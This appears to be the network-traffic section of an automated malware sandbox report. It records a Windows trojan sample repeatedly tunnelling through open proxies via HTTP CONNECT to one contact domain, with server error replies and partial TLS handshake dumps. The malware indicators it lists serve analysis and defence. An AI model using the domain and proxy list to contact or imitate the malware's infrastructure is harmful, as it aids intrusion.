                                                                                Feb 23, 2024 14:28:22.937589884 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.026401997 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:22 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                90192.168.2.84971172.210.208.10141455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.947290897 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                91192.168.2.850384104.20.233.70805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.950316906 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.037240028 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:22 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                92192.168.2.85027541.111.243.18805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.951302052 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.144747972 CET520INHTTP/1.1 502 Proxy Error
                                                                                Date: Fri, 23 Feb 2024 13:27:45 GMT
                                                                                Server: Apache
                                                                                Content-Length: 373
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 32 20 50 72 6f 78 79 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 50 72 6f 78 79 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 70 72 6f 78 79 20 73 65 72 76 65 72 20 72 65 63 65 69 76 65 64 20 61 6e 20 69 6e 76 61 6c 69 64 0d 0a 72 65 73 70 6f 6e 73 65 20 66 72 6f 6d 20 61 6e 20 75 70 73 74 72 65 61 6d 20 73 65 72 76 65 72 2e 3c 62 72 20 2f 3e 0d 0a 54 68 65 20 70 72 6f 78 79 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 3c 70 3e 52 65 61 73 6f 6e 3a 20 3c 73 74 72 6f 6e 67 3e 44 4e 53 20 6c 6f 6f 6b 75 70 20 66 61 69 6c 75 72 65 20 66 6f 72 3a 20 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 70 3e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>502 Proxy Error</title></head><body><h1>Proxy Error</h1><p>The proxy server received an invalidresponse from an upstream server.<br />The proxy server could not handle the request<p>Reason: <strong>DNS lookup failure for: heygirlisheeverythingyouwantedinaman.com</strong></p></p></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                93192.168.2.850385185.162.229.215805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.951303959 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.038573027 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:22 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                94192.168.2.85039145.12.31.140805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.954919100 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.043195009 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:22 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                95192.168.2.85040331.43.179.214805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.964445114 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.052292109 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:23 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                96192.168.2.850423104.20.75.132805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.976557970 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.063607931 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:23 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                97192.168.2.850322194.34.232.107805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.989104033 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.155788898 CET467INHTTP/1.1 403 Forbidden
                                                                                Date: Fri, 23 Feb 2024 13:28:23 GMT
                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                Content-Length: 306
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at heygirlisheeverythingyouwantedinaman.com Port 443</address></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                98192.168.2.850334162.19.7.46495795828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.990814924 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.341392994 CET24INHTTP/1.1 403 #string


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                99192.168.2.850448185.162.228.154805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.995318890 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.083095074 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:23 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                100192.168.2.850451104.16.230.163805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.996876955 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.084811926 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:23 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                101192.168.2.85026593.90.212.241535828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.998343945 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                102192.168.2.85030845.11.95.16550325828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.003093958 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                103192.168.2.85037154.38.179.203604065828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.016388893 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                104192.168.2.850469172.67.150.173805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.019112110 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.106789112 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:23 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                105192.168.2.850473172.64.86.217805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.020654917 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.108344078 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:23 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                106192.168.2.850370113.30.149.76805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.031738997 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                107192.168.2.85041718.133.16.21805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.051970005 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.387455940 CET165INHTTP/1.1 200 OK
                                                                                Date: Fri, 23 Feb 2024 13:28:23 GMT
                                                                                Content-Type: text/plain
                                                                                X-Powered-By: PHP/5.3.6-13ubuntu3.6
                                                                                Server: Microsoft-IIS/8.5
                                                                                Content-Length: 0
                                                                                Feb 23, 2024 14:28:23.389519930 CET394OUTData Raw: 16 03 03 01 85 01 00 01 81 03 03 65 d8 9d 76 ef 7a 4a 52 7c e9 20 c0 43 21 bf 97 81 c5 c1 de c7 3c 8d a5 36 98 81 80 14 90 b4 da 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                Data Ascii: evzJR| C!<6*,+0/$#('=<5/.-+(heygirlisheeverythingyouwantedinaman.com#]31VM\1#qJ2la3'QF
                                                                                Feb 23, 2024 14:28:23.547060966 CET1129INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 ca b6 19 34 ce 00 25 71 7e 65 fd e0 62 0e ae fc 97 63 5d f5 9e 9f ad f4 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 e8 0b 00 02 e4 00 02 e1 00 02 de 30
                                                                                Data Ascii: =94%q~ebc]DOWNGRD0000*H03110/U(heygirlisheeverythingyouwantedinaman.com0240223130621Z260222130621Z03110/U(heygirlisheeverythingyouwantedinaman.c
                                                                                Feb 23, 2024 14:28:23.549063921 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 ad ed 01 a8 8d b8 41 08 c5 c1 d2 b6 bf 7a 52 fa 6d dc 28 82 c4 f0 f6 da 23 90 42 15 bf cd e8 02 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 d1 86 0c 76 88 5c c1 be 96 78 7c 0e 3d 0a aa 97 15 af 20 7e ce
                                                                                Data Ascii: %! AzRm(#B(v\x|= ~/Mqq
                                                                                Feb 23, 2024 14:28:23.707933903 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 61 c2 6f a2 44 a8 72 bb 6a 50 a4 9d 81 f3 75 5c bd 96 64 fe 06 8a 07 da da 8b e5 41 28 cb 7d 03 f4 50 d9 c2 e3 99 9a 42
                                                                                Data Ascii: (aoDrjPu\dA(}PB


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                108192.168.2.850420184.169.154.119805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.053807974 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.219904900 CET187INHTTP/1.1 200 OK
                                                                                Date: Fri, 23 Feb 2024 13:28:23 GMT
                                                                                Content-Type: text/plain
                                                                                X-Powered-By: PHP/5.5.9-1ubuntu4.21
                                                                                Server: BBC 2.6.0.7; com.hp.openview.Coda 0.0.1
                                                                                Content-Length: 0
                                                                                Feb 23, 2024 14:28:23.220938921 CET394OUTData Raw: 16 03 03 01 85 01 00 01 81 03 03 65 d8 9d 76 da 4d b2 36 ac 85 8a cf 67 f3 fb 02 07 22 91 4a 46 de 3f 61 12 ab 6e ca ca c5 d9 da 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                Data Ascii: evM6g"JF?an*,+0/$#('=<5/.-+(heygirlisheeverythingyouwantedinaman.com#h>3/\h8hN;d\+poFJ||
                                                                                Feb 23, 2024 14:28:23.385500908 CET1129INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 a4 92 f5 3a ab 84 98 27 98 47 eb 8a a2 e4 25 50 16 25 e2 d2 0c 3f 0a 2e 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 e8 0b 00 02 e4 00 02 e1 00 02 de 30
